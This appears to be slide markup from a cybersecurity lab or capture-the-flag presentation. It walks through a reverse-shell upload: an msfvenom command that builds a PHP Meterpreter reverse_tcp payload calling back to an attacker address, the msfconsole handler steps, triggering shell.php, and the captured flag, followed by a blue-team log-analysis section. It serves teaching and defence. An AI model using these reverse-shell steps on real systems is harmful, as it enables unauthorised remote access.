              <a:ext cx="3961451" cy="3961451"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1269" name="Google Shape;1269;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5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn dur="1500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12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2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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73" name="Shape 1273"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1274" name="Google Shape;1274;p74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="145375" y="845975"/>
            <a:ext cx="4812000" cy="3918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38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation #4: Reverse-Shell Upload</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1276" name="Google Shape;1276;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sz="900"/>
              <a:t>Shout-out to Matthew Kuczynski for the command to locate which payload to use:  Msfvenom -l payloads | grep php</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1277" name="Google Shape;1277;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1116675" y="765875"/>
            <a:ext cx="3485400" cy="954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2200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Place shell on </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="2200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="2200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>vulnerable machine</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1278" name="Google Shape;1278;p74"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="945528"/>
            <a:ext cx="533372" cy="476605"/>
            <a:chOff x="457200" y="1452955"/>
            <a:chExt cx="695400" cy="621307"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1279" name="Google Shape;1279;p74"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1452955"/>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80" name="Google Shape;1280;p7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1" name="Google Shape;1281;p74"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="13956" l="0" r="34296" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5205500" y="686100"/>
            <a:ext cx="3715648" cy="4078150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1282" name="Google Shape;1282;p74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7859775" y="3246425"/>
            <a:ext cx="454200" cy="1335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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145375" y="2167475"/>
            <a:ext cx="5060100" cy="16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2100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> -p </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  php/meterpreter/reverse_tcp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    LHOST=192.168.1.90</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>      LPORT=4444 &gt;&gt; shell.php</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1284" name="Google Shape;1284;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282"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12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88" name="Shape 1288"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1289" name="Google Shape;128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100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation #4: Reverse-Shell Upload, continued</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1290" name="Google Shape;1290;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="86832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sz="800"/>
              <a:t>*Full commands: 1.msfconsole 2.use exploit/multi/handler 3.set payload php/meterpreter/reverse-tcp 4.show options 5. Set LHOST 192.168.1.90 (optional: show options)  6. exploit</a:t>
            </a:r>
            <a:endParaRPr sz="800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1291" name="Google Shape;1291;p75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="457250" y="888650"/>
            <a:ext cx="3501900" cy="3746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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457281" y="1095178"/>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93" name="Google Shape;1293;p75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457269" y="2164240"/>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94" name="Google Shape;1294;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1033275" y="888650"/>
            <a:ext cx="3178500" cy="1092900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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b="1" lang="en" sz="2100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>In Kali:</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="2100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Run msfconsole commands*</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1295" name="Google Shape;1295;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990675" y="1952938"/>
            <a:ext cx="3178500" cy="1092900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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b="1" lang="en" sz="2100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>In Firefox:</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="2100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Activate shell.php file</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1296" name="Google Shape;1296;p75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="499869" y="3742890"/>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04</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1297" name="Google Shape;1297;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1033275" y="3676900"/>
            <a:ext cx="2859300" cy="608700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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b="1" lang="en" sz="2100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>In Kali: Find the flag!</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1298" name="Google Shape;1298;p75"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="52383" l="0" r="49359" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4169175" y="982534"/>
            <a:ext cx="4539999" cy="905129"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1299" name="Google Shape;1299;p75"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="10538" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4169175" y="2164250"/>
            <a:ext cx="4540000" cy="745625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1300" name="Google Shape;1300;p75"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4169175" y="3414513"/>
            <a:ext cx="4539999" cy="1133483"/>
            <a:chOff x="4169175" y="3092575"/>
            <a:chExt cx="4539999" cy="1133483"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1301" name="Google Shape;1301;p75"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId5">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="53107" l="71183" r="10353" t="39498"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4169175" y="3092575"/>
              <a:ext cx="4539999" cy="1133483"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1302" name="Google Shape;1302;p75"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7706488" y="3492613"/>
              <a:ext cx="609600" cy="619200"/>
            </a:xfrm>
            <a:prstGeom prst="star5">
              <a:avLst>
                <a:gd fmla="val 19098" name="adj"/>
                <a:gd fmla="val 105146" name="hf"/>
                <a:gd fmla="val 110557" name="vf"/>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75"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1123950" y="2862450"/>
            <a:ext cx="2396900" cy="840350"/>
            <a:chOff x="1123950" y="2862450"/>
            <a:chExt cx="2396900" cy="840350"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1304" name="Google Shape;1304;p75"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1123950" y="2862450"/>
              <a:ext cx="1120466" cy="840350"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1305" name="Google Shape;1305;p75"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2063450" y="2909871"/>
              <a:ext cx="1457400" cy="745500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>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b="1" lang="en" sz="2100">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto"/>
                  <a:ea typeface="Roboto"/>
                  <a:cs typeface="Roboto"/>
                  <a:sym typeface="Roboto"/>
                </a:rPr>
                <a:t>We’re in!</a:t>
              </a:r>
              <a:endParaRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1306" name="Google Shape;130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298"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="129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299"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn dur="3300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12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3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="130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300"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn dur="3000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13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310" name="Shape 1310"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1311" name="Google Shape;1311;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273450" y="854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200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>flag.txt</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1312" name="Google Shape;1312;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313" name="Google Shape;1313;p76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1724700" y="3906175"/>
            <a:ext cx="5694600" cy="757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4" name="Google Shape;1314;p76"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="80000"/>
          </a:blip>
          <a:srcRect b="10078" l="11039" r="0" t="13916"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1021612" y="872412"/>
            <a:ext cx="7100770" cy="4044240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1315" name="Google Shape;1315;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3823075"/>
            <a:ext cx="9144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4800">
                <a:solidFill>
                  <a:srgbClr val="D9EAD3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>b1ng0w@5h1sn@m0</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="D9EAD3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1316" name="Google Shape;131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5000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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20" name="Shape 1320"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1321" name="Google Shape;1321;p7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322" name="Google Shape;1322;p77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="320375" y="1827300"/>
            <a:ext cx="8503200" cy="1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txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="175242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34F5C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blue Team</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="134F5C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="134F5C"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Log Analysis and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="134F5C"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="134F5C"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Attack Characterization</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:srgbClr val="134F5C"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1324" name="Google Shape;1324;p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Analysis: Identifying the Port Scan</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1330" name="Google Shape;1330;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331" name="Google Shape;1331;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="300675" y="848675"/>
            <a:ext cx="8409300" cy="38589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Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1332" name="Google Shape;1332;p78"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="438146" y="1019725"/>
            <a:ext cx="4395801" cy="2042000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
